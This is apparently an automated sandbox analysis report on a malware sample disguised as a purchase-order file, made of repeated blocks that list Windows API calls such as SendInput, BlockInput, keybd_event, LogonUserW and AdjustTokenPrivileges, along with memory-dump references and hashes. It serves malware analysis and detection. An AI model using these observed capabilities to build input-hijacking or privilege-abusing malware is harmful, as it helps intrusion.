                                                                                                                                                                                                      • Opcode ID: 99eb2e9a69b9efde770805638817cec2eee40622dd8b9a92b0c912a1b31f1f85
                                                                                                                                                                                                      • Instruction ID: b4d5b0d7a01a684f82e8b60c88ce236abec20dd9d05ce19a1c66ba28494584a1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99eb2e9a69b9efde770805638817cec2eee40622dd8b9a92b0c912a1b31f1f85
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2E0467240490CABCF01AFE9DD08AB83B79EB54381F014018FA498A222CB35DE43CB85
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044F599
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0044F5C9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                      • Opcode ID: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
                                                                                                                                                                                                      • Instruction ID: f1cd61f13b4ef61f2258d90b24d8a70c52a44234eaa919de3b45e9d4c70e834c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF11C4316002009FD700EF29D849A2EB3E9FF84324F00892EF9A5D73D1DB74AD058B89
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEA7
                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEB9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                      • Opcode ID: ecf6cfc2828abf12460fa7359127f3ae001f06c3e47a01065ee166652e2fa896
                                                                                                                                                                                                      • Instruction ID: 38b4f1614884c6b466561351100e4d6413efc0af59102ccdb8bb2b0083ef7f16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecf6cfc2828abf12460fa7359127f3ae001f06c3e47a01065ee166652e2fa896
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CF0E231501229EBEB10EBA0DC88FEA736CBF08360F00416AF805D2181D7349A00CBA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00444153
                                                                                                                                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00444166
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                                      • Opcode ID: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
                                                                                                                                                                                                      • Instruction ID: fbbd680bab7d3c56282e5d27e33836289a13848d61ac285d335470ecaf5d92a6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0307090434DAFEB059FA4C809BBE7FB4EF04305F04841AF96696191D779C616DFA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0043ACC0), ref: 0043AB99
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,0043ACC0), ref: 0043ABAB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                                                      • Opcode ID: b9f7d5613385e1da6d55d95aebb9b8bdf3ce4966f90b2562a8f7ae14a07bf1b9
                                                                                                                                                                                                      • Instruction ID: d05ca891511b1101e5b1e2ebcce66da84dd88e23b38a4ffdf4c9dfd1041b73b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9f7d5613385e1da6d55d95aebb9b8bdf3ce4966f90b2562a8f7ae14a07bf1b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE0BF71000510AFE7252F55EC05DB7B7AAEB04324B10882EB99981471D7666C95AB54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00426DB3,-0000031A,?,?,00000001), ref: 004281B1
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004281BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
                                                                                                                                                                                                      • Instruction ID: cb4d899765201692ad32a28ec14761de77d0b6c524f12578595b3ebc96636b9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEB09231445608ABDB002BA1EC09B5C7F68EB08652F004438FA0D440A18B7254109B9A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
                                                                                                                                                                                                      • Instruction ID: 9386638fda9fd413a2794a4d8da2c2628334511d74af6c625826b4761eb94a98
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE323672E29F114DD7239634D922336A288AFB73D4F55D737F819B5AAAEB28C4C34104
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __itow__swprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 674341424-0
                                                                                                                                                                                                      • Opcode ID: 662c84ebe0012998779ca2b2c8800ac6bb571693832b63448c70b89e26b863a0
                                                                                                                                                                                                      • Instruction ID: 44eb92a974ec04ae678a45c2a6fc85566987a502e803283e11ac4ed19b42c345
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 662c84ebe0012998779ca2b2c8800ac6bb571693832b63448c70b89e26b863a0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E622A1716083019FD724DF15C480B9BB7E4AF84314F14892EF89AA7291DB79ED45CB8A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
                                                                                                                                                                                                      • Instruction ID: 69bf81b66c3c26f1d0dd6c17de0175bc626120c7630bd7c8ead8038a3ade81aa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AB1E220D2AF414DD72396398831336B75CAFBB2D5FA1D72BFC1A74D62EB2185934284
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AF399E,?,?,00000008,?,?,00AF1CF4,00000000), ref: 00AF3BD0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                      • Opcode ID: 5deedc8b286f501e9f3f25b05d4a9da71108be7258bba73f32abcfe687d91436
                                                                                                                                                                                                      • Instruction ID: a7bb794b9da912d6c28dac61e7aa76ca56a1e268c11c7b821f4ce30f3afb9585
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5deedc8b286f501e9f3f25b05d4a9da71108be7258bba73f32abcfe687d91436
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAB13E721106089FDB15CF68C49AB657BE0FF45364F258698FADACF2A1C335DA92CB40
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __time64.LIBCMT ref: 0044B6DF
                                                                                                                                                                                                        • Part of subcall function 0042344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0044BDC3,00000000,?,?,?,?,0044BF70,00000000,?), ref: 00423453
                                                                                                                                                                                                        • Part of subcall function 0042344A: __aulldiv.LIBCMT ref: 00423473
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2893107130-0
                                                                                                                                                                                                      • Opcode ID: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
                                                                                                                                                                                                      • Instruction ID: 1f35ff8c92ab85e28a2e756204d048eea2d4dd3abb22b0d8cab743f592bf07ce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9821A2766345108BD729CF38C881A92B7E1EB95311B248E7DE4E5CB2D0CB78B905DB98
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 00456ACA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                      • Opcode ID: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
                                                                                                                                                                                                      • Instruction ID: 4b42a4be7651b4fa624864156804a6211604a361ef3ec37b6f4db9037ef0e3f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE092352002046FD700EB99D40499AB7ECAFA4351B04842BF905D7291DAB4E8088B94
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0044750A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                                                      • Opcode ID: 60d1a7ff6e30d01b75608834012f6c66df7d7732c1d7c55b9425bf1f60535cfd
                                                                                                                                                                                                      • Instruction ID: b1c6601c3e7c198507b9802ed8dd93b8fb3c162f29ab6dc9e599c823946f98a7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d1a7ff6e30d01b75608834012f6c66df7d7732c1d7c55b9425bf1f60535cfd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D09EA416C64579FC190B249D1BFB71608F300795FD4495B7603DD9C1AAEC6D07A03D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0043AD3E), ref: 0043B124
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LogonUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1244722697-0
                                                                                                                                                                                                      • Opcode ID: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
                                                                                                                                                                                                      • Instruction ID: 9ead16adecf6f0b98c9b1c0a3e5b035ff8be85389ca5a659f0ab2e7831142da2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408510FA11D50A0C671D531AB50
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                      • Opcode ID: 196a95de5c9a0d0b07e1a1c9e201b9c33cbb7d2a0780617c91a43e3abc117b76
